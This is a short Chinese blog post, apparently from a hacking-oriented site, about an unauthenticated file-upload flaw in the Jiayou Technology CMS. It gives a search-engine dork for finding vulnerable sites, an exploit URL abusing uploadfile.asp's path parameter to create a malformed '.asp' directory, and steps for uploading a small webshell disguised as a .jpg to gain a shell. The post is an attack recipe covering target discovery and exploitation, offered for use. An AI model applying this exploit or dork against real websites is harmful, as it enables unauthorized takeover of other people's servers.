我喜欢黑夜,喜欢网络安全,孤独寂寞的黑夜里,我只需要,一包烟,一台笔记本...
更多
首  页>>网络攻防>> 漏洞信息嘉友科技cms上传漏洞
嘉友科技cms上传漏洞
4288
0推荐
0评论

嘉友科技cms上传漏洞


程序采用的上传页uploadfile.asp未进行验证,导致建立畸形目录上传图片木马获取shell漏洞。

谷歌关键字:inurl:newslist.asp?NodeCode=



exp:http://www.site.com/admin/uploadfile.asp?uppath=mad.asp&upname=&uptext=form1.mad.asp


他原上传目录是:http://www.site.com/uploadfile.asp?uppath=PicPath&upname=&uptext=form1.PicPath



而且他的上传文件没有过滤导致未授权访问。


直接上传小马 然后小马后面写为 1.jpg  访问路径 查看源代码


已经有 ( 0 ) 位网友对此发表了自己的看法,你也评一评吧! 此文不错,我要推荐-->    推 荐
欢迎参与讨论,请在这里发表您的看法、交流您的观点@禁止各种脚本

  • 点击Top
  • 推荐Top
  • 评论Top
更 多>>
本站采用Java语言开发,Spring框架,欢迎朋友们提意见。重新对页面进行布局,修改了程序,方便开源使用,由于本人美工真的不行 ,很少用背景图片,页面基本都用背景色...
主题:无色无味 | 网站地图|
Copyright (c) 2012-2013 www.shack2.org All Rights Reserved. | 空ICP备111111111号 | 程序设计: shack2 Powered by SJBlog v1.0 联系QQ:1341413415